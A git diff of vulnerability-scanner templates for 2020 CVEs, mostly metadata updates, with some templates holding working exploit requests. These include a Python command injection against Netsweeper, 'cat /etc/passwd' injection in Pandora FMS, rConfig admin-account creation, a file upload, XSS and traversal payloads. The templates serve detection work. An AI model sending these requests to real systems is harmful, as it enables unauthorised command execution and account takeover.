4a0a004730450221009d5eb5b9c08d4a9bfd0cdd2f254d278a83fddfcbc27f0818e577eb12e52c53c4022061d6c29b707c70fd6184e575804a52bf1eeeb40d7c9901c6d74aec5b7e53d88c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-12447.yaml b/http/cves/2020/CVE-2020-12447.yaml index 2e4d960cad..3fdc5e0017 100644 --- a/http/cves/2020/CVE-2020-12447.yaml +++ b/http/cves/2020/CVE-2020-12447.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion. + remediation: | + Apply the latest firmware update provided by the vendor to fix the directory traversal vulnerability. reference: - https://blog.spookysec.net/onkyo-lfi - https://nvd.nist.gov/vuln/detail/CVE-2020-12447 @@ -14,10 +16,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12447 cwe-id: CWE-22 - epss-score: 0.01261 - tags: cve,cve2020,onkyo,lfi,traversal + epss-score: 0.01778 + epss-percentile: 0.86658 + cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: onkyo + product: tx-nr585_firmware + tags: cve,cve2020,onkyo,lfi,traversal http: - method: GET @@ -26,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/04 +# digest: 4a0a0047304502206db5714e0973533412a9827bd784a1c96d015b0bf0d827912a961ef84f3f583802210093cf89286fdda15907f340707e7cf49a631a37ce71ade304a54f197476d6a96e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index 3b63e404d8..95160638fd 100644 --- a/http/cves/2020/CVE-2020-12478.yaml +++ b/http/cves/2020/CVE-2020-12478.yaml @@ -6,6 +6,8 @@ info: severity: high description: | TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to a patched version of TeamPass or apply the recommended security patches. reference: - https://github.com/nilsteampassnet/TeamPass/issues/2764 - https://nvd.nist.gov/vuln/detail/CVE-2020-12478 @@ -14,12 +16,15 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12478 cwe-id: CWE-306 - cpe: cpe:2.3:a:teampass:teampass:*:*:*:*:*:*:*:* - epss-score: 0.00893 + epss-score: 0.01186 + epss-percentile: 0.83552 + cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:"teampass" verified: true + max-request: 1 + vendor: teampass + product: teampass + shodan-query: http.html:"teampass" tags: cve,cve2020,teampass,exposure,unauth http: @@ -43,4 +48,4 @@ http: status: - 200 -# Enhanced by md on 2023/02/01 +# digest: 4a0a0047304502206addd5ba17edfdd529ebe76e33a62d7f3becabdfcf8f3f9621578d160e0bfc5f022100f33eafad46586e486f65a6d359d47a6c486c7e3da50893f86d40c6ddaa3fab83:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index 9ce3f26dd2..e66e728d68 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -5,21 +5,27 @@ info: author: pdteam severity: critical description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL injection attacks. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of vBulletin. reference: - https://github.com/rekter0/exploits/tree/master/CVE-2020-12720 - https://nvd.nist.gov/vuln/detail/CVE-2020-12720 - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1 - http://packetstormsecurity.com/files/157716/vBulletin-5.6.1-SQL-Injection.html + - http://packetstormsecurity.com/files/157904/vBulletin-5.6.1-SQL-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-12720 - cwe-id: CWE-89,CWE-306 + cwe-id: CWE-306 + epss-score: 0.8945 + epss-percentile: 0.98411 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* - epss-score: 0.84671 - tags: cve2020,vbulletin,sqli,packetstorm,cve metadata: max-request: 1 + vendor: vbulletin + product: vbulletin + tags: cve2020,vbulletin,sqli,packetstorm,cve http: - raw: @@ -37,4 +43,4 @@ http: words: - "vbulletinrce" -# Enhanced by mp on 2022/04/01 +# digest: 490a00463044022072f9fcd7a07f770d4c2d7f08fd16b8d7bd937b3ebf87ee77d04a5c3d9e5859af022073bdaa612a8bcd65a2eb1f91dd65a3182c0c2a10469639f9789dd13123aa23c1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-12800.yaml b/http/cves/2020/CVE-2020-12800.yaml index bcb574bd05..e2c05a5594 100644 --- a/http/cves/2020/CVE-2020-12800.yaml +++ b/http/cves/2020/CVE-2020-12800.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file. + remediation: | + Update the Contact Form 7 plugin to version 1.3.3.3 or later to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-12800 - https://github.com/amartinsec/CVE-2020-12800 @@ -16,11 +18,15 @@ info: cvss-score: 9.8 cve-id: CVE-2020-12800 cwe-id: CWE-434 - cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:*:*:* - epss-score: 0.97428 - tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020,intrusive + epss-score: 0.97431 + epss-percentile: 0.99921 + cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 + vendor: codedropz + product: drag_and_drop_multiple_file_upload_-_contact_form_7 + framework: wordpress + tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020,intrusive http: - raw: @@ -52,12 +58,12 @@ http: CVE-2020-12800-{{randstr}} -----------------------------350278735926454076983690555601-- - - | GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} req-condition: true + matchers-condition: and matchers: - type: word @@ -68,4 +74,5 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/05/16 + +# digest: 490a0046304402206fde8c7cf9e560fc430b80b88293295df01cef8ad202dada218d25c670208a460220773f01f989d37bf679812f16c169e3e75eb570418fb2a670a5d8ed62eb8bd8b8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index a47050c766..098d915930 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html - https://nvd.nist.gov/vuln/detail/CVE-2020-13117 @@ -13,10 +15,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13117 cwe-id: CWE-77 - epss-score: 0.06609 + epss-score: 0.08191 + epss-percentile: 0.93627 + cpe: cpe:2.3:o:wavlink:wn575a4_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: wavlink + product: wn575a4_firmware shodan-query: http.title:"Wi-Fi APP Login" tags: cve,cve2020,wavlink,rce,oast,router @@ -47,4 +53,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/16 \ No newline at end of file +# digest: 4a0a00473045022100c855f246535b79109099d446bf1d943d3437db1a9890dc88cff4a764a45171c302202abd1d2670fcdbbc76a4dbcff06a658f0e3471e86babf068e0ef7fb842d698bf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index c97dce76df..bc6be64b99 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Submitty through 20.04.01 contains an open redirect vulnerability via authentication/login?old= during an invalid login attempt. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to Submitty version 20.04.01 or later to fix the open redirect vulnerability. reference: - https://github.com/Submitty/Submitty/issues/5265 - https://nvd.nist.gov/vuln/detail/CVE-2020-13121 @@ -13,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-13121 cwe-id: CWE-601 - cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* epss-score: 0.00235 - tags: cve,cve2020,redirect,submitty,oos + epss-percentile: 0.61472 + cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rcos + product: submitty + tags: cve,cve2020,redirect,submitty,oos http: - raw: @@ -37,4 +42,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2023/02/08 +# digest: 4a0a00473045022100b2ac9cab5d21a0ceec858cf9071a4d16f83b546d34a8177f47964f993d001fb4022032e335bf8032e6142dd3a304966beb077d894543adc97512a524de568b513be8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index 3c0b658411..2efcfdb3fd 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Artica Proxy Community Edition before 4.30.000000 is vulnerable to local file inclusion via the fw.progrss.details.php popup parameter. + remediation: | + Upgrade to Artica Proxy Community Edition version 4.30.000000 or later to fix the Local File Inclusion vulnerability. reference: - https://github.com/InfoSec4Fun/CVE-2020-13158 - https://sourceforge.net/projects/artica-squid/files/ @@ -14,11 +16,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-13158 cwe-id: CWE-22 - cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:*:*:*:* - epss-score: 0.96915 - tags: cve,cve2020,artica,lfi + epss-score: 0.01822 + epss-percentile: 0.86877 + cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:community:*:*:* metadata: max-request: 1 + vendor: articatech + product: artica_proxy + tags: cve,cve2020,artica,lfi http: - method: GET @@ -35,5 +40,4 @@ http: status: - 200 - -# Enhanced by mp on 2022/07/13 +# digest: 4a0a00473045022100ef9a31ff5dbbcbcaa1f3b4be7dcd974e81ce2aa296223779ac2de061b863de7702207f2cfcf944ee68534831f23c94c4c15945922dba539ffcb37cc2762daefb2d74:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index fdaec92d5f..64e3a998c5 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters. + remediation: | + Upgrade to a patched version of Netsweeper (>=6.4.4) to mitigate this vulnerability. reference: - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/ - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says @@ -15,17 +17,22 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13167 cwe-id: CWE-78 + epss-score: 0.97419 + epss-percentile: 0.99909 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* - epss-score: 0.97387 metadata: max-request: 2 - hex-payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out + vendor: netsweeper + product: netsweeper tags: cve,cve2020,netsweeper,rce,python,webadmin +variables: + rand_str: "{{randstr}}" + cmd: 'echo "{{base64(rand_str)}}" | base64 -d > /usr/local/netsweeper/webadmin/out' http: - method: GET path: - - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" + - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(cmd))}}%27.decode%28%27hex%27%29%29%23&timeout=5" - "{{BaseURL}}/webadmin/out" headers: @@ -34,12 +41,12 @@ http: matchers-condition: and matchers: - type: word - part: body + part: body_2 words: - - "nonexistent" + - "{{rand_str}}" - type: status status: - 200 -# Enhanced by mp on 2022/05/16 +# digest: 4a0a00473045022065b8df98548c4ff18a996b78f3894b33d9ba7d34af4faab355f8cde661d03b85022100e353a1de9af8a68c503c8516737813de5621a96fc3d44b297aad63adacbdaea2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index a37addf906..c4aa76d367 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Contentful through 2020-05-21 for Python contains a reflected cross-site scripting vulnerability via the api parameter to the-example-app.py. + remediation: | + Upgrade Contentful to a version that is not vulnerable to CVE-2020-13258 or apply the necessary patches provided by the vendor. reference: - https://github.com/contentful/the-example-app.py/issues/44 - https://nvd.nist.gov/vuln/detail/CVE-2020-13258 @@ -14,11 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-13258 cwe-id: CWE-79 - cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* epss-score: 0.00464 - tags: cve,cve2020,contentful,xss + epss-percentile: 0.72684 + cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: contentful + product: python_example + tags: cve,cve2020,contentful,xss http: - raw: @@ -43,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/14 +# digest: 4a0a0047304502200c8035ea7508d77b2cfac51c039eb6e58ea359bd0ad2df0e61ca97e70acf0796022100d53a2a9f74ea93b3915d7b31c2b62778dc1dbe2c3f620b4828a53303b4eb48b5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index a49ae3ada9..b6e6c69a50 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -6,29 +6,36 @@ info: severity: high description: | Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: Upgrade to 6.3.4 or higher. reference: - https://github.com/advisories/GHSA-wc9w-wvq2-ffm9 - https://github.com/grafana/grafana/commit/ba953be95f0302c2ea80d23f1e5f2c1847365192 - http://www.openwall.com/lists/oss-security/2020/06/03/4 - https://nvd.nist.gov/vuln/detail/CVE-2020-13379 - remediation: Upgrade to 6.3.4 or higher. + - http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H cvss-score: 8.2 cve-id: CVE-2020-13379 cwe-id: CWE-918 - epss-score: 0.24779 + epss-score: 0.25457 + epss-percentile: 0.96144 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"Grafana" verified: true + max-request: 2 + vendor: grafana + product: grafana + shodan-query: title:"Grafana" tags: cve,cve2020,grafana,ssrf http: - - method: GET path: - "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1" + - "{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1" + + stop-at-first-match: true matchers-condition: and matchers: @@ -48,4 +55,4 @@ http: status: - 200 -# Enhanced by md on 2023/04/12 +# digest: 4a0a00473045022100c73b2514c6e81f2d72beae7642f2243cee4219d9325c2636e91bc7a1ffee4cd102207befaae6cabee2fd9d6fd4d04459a6cd332d7ba9024d121a1e285c53b469b80b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index e2ff6083ec..def0fe9af8 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Microweber before 1.1.20 is susceptible to information disclosure via userfiles/modules/users/controller/controller.php. An attacker can disclose the users database via a /modules/ POST request and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Microweber to version 1.1.20 or later to mitigate the vulnerability. reference: - https://rhinosecuritylabs.com/research/microweber-database-disclosure/ - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6 @@ -15,12 +17,15 @@ info: cvss-score: 7.5 cve-id: CVE-2020-13405 cwe-id: CWE-306 + epss-score: 0.00673 + epss-percentile: 0.77567 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* - epss-score: 0.00591 metadata: - max-request: 3 - shodan-query: http.html:"microweber" verified: true + max-request: 3 + vendor: microweber + product: microweber + shodan-query: http.html:"microweber" tags: cve,cve2020,microweber,unauth,disclosure http: @@ -38,7 +43,6 @@ http: - "users/controller" - "modules/users/controller" - "/modules/users/controller" - matchers: - type: dsl dsl: @@ -49,4 +53,4 @@ http: - 'contains(header,"text/html")' condition: and -# Enhanced by md on 2023/04/04 +# digest: 4a0a00473045022001bb58a507ffdfe11f480f64f15f72157b7a26cfc7c9cc9c4e6e6247337aae6c02210082fffd82048dfb621c67f872f672635bb171ac9319119034d0f351b98c61d4ab:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index ad195b4d5b..4940fc66ef 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu,3th1c_yuk1 severity: medium description: The Web Application Firewall in Bitrix24 up to and including 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. + remediation: | + Upgrade to a patched version of Bitrix24 (version >20.0.0) to mitigate this vulnerability. reference: - https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558 - https://twitter.com/brutelogic/status/1483073170827628547 @@ -14,11 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-13483 cwe-id: CWE-79 - cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* epss-score: 0.00113 - tags: cve,cve2020,xss,bitrix + epss-percentile: 0.44548 + cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: bitrix24 + product: bitrix24 + tags: cve,cve2020,xss,bitrix http: - method: GET @@ -27,9 +32,9 @@ http: - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E' stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: @@ -46,4 +51,4 @@ http: status: - 200 -# Enhanced by cs 2022/09/14 +# digest: 4a0a0047304502206d7f80dcdd8c1dff63e9fb73966e6fea7dd6785914af76324f99cea09a363ba3022100978e33b51a2d141a68b182ee0badf6cfb56ad060d82b4985c8289c535327eef3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13638.yaml b/http/cves/2020/CVE-2020-13638.yaml new file mode 100644 index 0000000000..20cc59f28e --- /dev/null +++ b/http/cves/2020/CVE-2020-13638.yaml @@ -0,0 +1,101 @@ +id: CVE-2020-13638 + +info: + name: rConfig 3.9 - Authentication Bypass(Admin Login) + author: theamanrawat + severity: critical + description: | + lib/crud/userprocess.php in rConfig 3.9.x before 3.9.7 has an authentication bypass, leading to administrator account creation. This issue has been fixed in 3.9.7. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-13638 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-13638 + cwe-id: CWE-269 + epss-score: 0.28154 + epss-percentile: 0.96303 + cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: rconfig + product: rconfig + shodan-query: http.title:"rConfig" + tags: cve,cve2020,rconfig,auth-bypass,intrusive +variables: + username: "{{to_lower(rand_text_alpha(5))}}" + password: "{{rand_text_alphanumeric(12)}}!" + email: "{{rand_base(8)}}@{{rand_base(5)}}.com" + +http: + - raw: + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb + + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="username" + + {{username}} + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="passconf" + + {{password}} + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="password" + + {{password}} + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="email" + + {{email}} + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="editid" + + + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="add" + + add + --01b28e152ee044338224bf647275f8eb + Content-Disposition: form-data; name="ulevelid" + + 9 + --01b28e152ee044338224bf647275f8eb-- + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + + cookie-reuse: true + host-redirects: true + + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - "rConfig - Configuration Management" + - "Logged in as" + - "dashboadFieldSet" + condition: and + + - type: word + part: header_3 + words: + - 'text/html' + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100ac9af5b4e23fa8ed7f18ed51c342555d15f7192742654c413e1209fc1f342c69022100ce6a65534d6852fa108e6cb6f09285dc45408b6f2003453f8b8e2f3c80978f39:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml index 3e852bad8b..7f1f202760 100644 --- a/http/cves/2020/CVE-2020-13700.yaml +++ b/http/cves/2020/CVE-2020-13700.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values. + remediation: | + Update the acf-to-rest-api plugin to version >3.1.0 or apply the latest security patches. reference: - https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5 - https://wordpress.org/plugins/acf-to-rest-api/#developers @@ -16,11 +18,15 @@ info: cvss-score: 7.5 cve-id: CVE-2020-13700 cwe-id: CWE-639 - cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:*:*:* - epss-score: 0.01462 - tags: cve,cve2020,wordpress,plugin + epss-score: 0.01923 + epss-percentile: 0.87302 + cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: acf_to_rest_api_project + product: acf_to_rest_api + framework: wordpress + tags: cve,cve2020,wordpress,plugin http: - method: GET @@ -29,20 +35,19 @@ http: matchers-condition: and matchers: - - type: word + part: header words: - 'Content-Type: application/json' - part: header - type: word + part: body words: - 'acf-to-rest-api\/class-acf-to-rest-api.php' - part: body condition: and - type: status status: - 200 -# Enhanced by mp on 2022/07/13 +# digest: 490a0046304402204555f291e3b6521f03e1ddb65cdc12354bfa7ebc3eb84ec0e9a2587768c6439702205d54718489381547ff7f900a07eab62a385dbbeb2c380472177fda59be8b529f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index a7e9c69519..401ec527be 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -6,22 +6,28 @@ info: severity: medium description: | Extreme Management Center 8.4.1.24 contains a cross-site scripting vulnerability via a parameter in a GET request. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Extreme Management Center. reference: - https://medium.com/@0x00crash/xss-reflected-in-extreme-management-center-8-4-1-24-cve-2020-13820-c6febe951219 - https://gtacknowledge.extremenetworks.com/articles/Solution/000051136 - https://gtacknowledge.extremenetworks.com - https://nvd.nist.gov/vuln/detail/CVE-2020-13820 + - https://documentation.extremenetworks.com/release_notes/netsight/XMC_8.5.0_Release_Notes.pdf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-13820 cwe-id: CWE-79 - cpe: cpe:2.3:a:extremenetworks:extreme_management_center:*:*:*:*:*:*:*:* - epss-score: 0.00222 + epss-score: 0.00237 + epss-percentile: 0.61573 + cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"Extreme Management Center" verified: true + max-request: 1 + vendor: extremenetworks + product: extreme_management_center + shodan-query: title:"Extreme Management Center" tags: cve,cve2020,xss,extremenetworks http: @@ -47,4 +53,4 @@ http: status: - 200 -# Enhanced by mp on 2022/10/05 +# digest: 4b0a00483046022100c6c21f1aa6f705672ed6f6772048194df2cb05f0bd06a7b93b863dceed607fa7022100bdfb4b97d7bce8772c673ceb12b038d3fe852115b6fdd8590b1dea99125b937d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-13851.yaml b/http/cves/2020/CVE-2020-13851.yaml new file mode 100644 index 0000000000..407765d89b --- /dev/null +++ b/http/cves/2020/CVE-2020-13851.yaml @@ -0,0 +1,54 @@ +id: CVE-2020-13851 + +info: + name: Artica Pandora FMS 7.44 - Remote Code Execution + author: theamanrawat + severity: high + description: | + Artica Pandora FMS 7.44 allows remote command execution via the events feature. + reference: + - https://packetstormsecurity.com/files/158390/Pandora-FMS-7.0-NG-7XX-Remote-Command-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-13851 + - https://www.coresecurity.com/advisories + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-13851 + cwe-id: CWE-78 + epss-score: 0.96694 + epss-percentile: 0.99524 + cpe: cpe:2.3:a:pandorafms:pandora_fms:7.44:*:*:*:*:*:*:* + metadata: + verified: "true" + max-request: 1 + vendor: pandorafms + product: pandora_fms + shodan-query: title:"Pandora FMS" + tags: packetstorm,cve,cve2020,rce,pandora,unauth,artica + +http: + - raw: + - | + POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + + - type: word + part: header + words: + - "text/html" + - "PHPSESSID=" + condition: and + + - type: status + status: + - 200 + +# digest: 